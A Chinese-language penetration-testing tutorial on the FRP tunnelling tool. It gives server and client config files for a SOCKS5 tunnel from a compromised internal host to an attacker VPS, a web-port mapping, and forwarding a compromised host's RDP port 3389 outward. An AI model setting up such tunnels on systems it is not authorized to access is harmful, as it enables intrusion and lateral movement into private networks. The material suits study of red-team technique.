使用FRP建立隧道
现在有这么一个场景,我们获得了一个位于内网的通过NAT方式对外提供服务的主机的权限,现在我们需要对其所在的内网继续进行渗透。于是,我们就需要通过FRP建立一个隧道,让我们的主机可以通过隧道访问其内网。
![内网渗透 | 内网穿透工具FRP的使用 内网渗透 | 内网穿透工具FRP的使用]()
服务端
我们的vps作为服务端,服务端启动:frps.exe -c frps.ini ,服务端的配置 frps.ini 如下
[common]
bind_addr = 0.0.0.0
bind_port = 17000
dashboard_addr = 0.0.0.0
dashboard_port = 27500
dashboard_user = root
dashboard_pwd = 123456
token = 1q2w3e
heartbeat_timeout = 90
max_pool_count = 5
客户端
被控的主机作为客户端,客户端启动:frpc.exe -c frpc.ini ,客户端的配置文件 frpc.ini 如下
[common]
server_addr = 100.20.14.14
server_port = 17000
token = 1q2w3e
pool_count = 5
protocol = tcp
health_check_type = tcp
health_check_interval_s = 100
[test]
remote_port = 10000
plugin = socks5
use_encryption = true
use_compression = true
访问 http://100.20.14.14:27500 ,用 root 123456 登录, 查看TCP。说明隧道搭建完成
![内网渗透 | 内网穿透工具FRP的使用 内网渗透 | 内网穿透工具FRP的使用]()
我们本机设置代理:socks5 100.20.14.14 10000
使用FRP映射Web服务
现在有这么一个场景,位于内网的主机需要对外提供Web服务,于是将内网主机的80端口映射到公网主机的80端口上
![内网渗透 | 内网穿透工具FRP的使用 内网渗透 | 内网穿透工具FRP的使用]()
服务端
位于公网的主机作为服务端,服务端启动:frps.exe -c frps.ini ,服务端的配置 frps.ini 如下
[common]
bind_addr = 0.0.0.0
bind_port = 17000
dashboard_addr = 0.0.0.0
dashboard_port = 27500
dashboard_user = root
dashboard_pwd = 123456
token = 1q2w3e
heartbeat_timeout = 90
客户端
位于内网的主机作为客户端,客户端启动:frpc.exe -c frpc.ini ,客户端的配置文件 frpc.ini 如下
[common]
server_addr = 100.20.14.14
server_port = 17000
token = 1q2w3e
[HTTP]
type=tcp
local_ip = 127.0.0.1
local_port = 80
remote_port = 80
custom_domains=www.test.com
访问 http://100.20.14.14:27500 ,用 root 123456 登录, 查看TCP。说明隧道搭建完成
![内网渗透 | 内网穿透工具FRP的使用 内网渗透 | 内网穿透工具FRP的使用]()
然后访问http://100.20.14.14 就是相当于访问位于内网的主机 http://192.168.10.10 了
使用FRP映射3389端口
现在有这么一个场景,我们获得了位于内网的一台主机的权限,并且知道了他的登录用户名和密码。他的3389端口只对内网开放,现在我们需要将该主机的3389端口映射到公网我们的VPS的3389端口,那样,我们连接我们VPS的3389端口就相当于连接内网主机的3389端口了
![内网渗透 | 内网穿透工具FRP的使用 内网渗透 | 内网穿透工具FRP的使用]()
服务端
位于公网的VPS作为服务端,服务端启动:frps.exe -c frps.ini ,服务端的配置 frps.ini 如下:
[common]
bind_addr = 0.0.0.0
bind_port = 17000
dashboard_addr = 0.0.0.0
dashboard_port = 27500
dashboard_user = root
dashboard_pwd = 123456
token = 1q2w3e
heartbeat_timeout = 90
客户端
位于内网的主机作为客户端,客户端启动:frpc.exe -c frpc.ini ,客户端的配置文件 frpc.ini 如下:
[common]
server_addr = 100.20.14.14
server_port = 17000
token = 1q2w3e
[test]
type=tcp
local_ip = 127.0.0.1
local_port = 3389
remote_port = 3389
访问 http://100.20.14.14:27500 ,用 root 123456 登录, 查看TCP。说明隧道搭建完成
![内网渗透 | 内网穿透工具FRP的使用 内网渗透 | 内网穿透工具FRP的使用]()
远程连接100.20.14.14的3389端口即可。
![内网渗透 | 内网穿透工具FRP的使用 内网渗透 | 内网穿透工具FRP的使用]()
注:使用FRP映射其他服务,例如SSH、Mysql、Redis等服务都是和映射web、RDP服务一样,修改一下要映射的端口即可。
FRP工具包下载:关注微信公众号:xie_sec 回复:FRP 即可下载。本工具仅供学习使用,请勿用于非法途径!
相关软件:
NPS-一款功能强大的内网穿透代理工具
https://github.com/ehang-io/nps
评论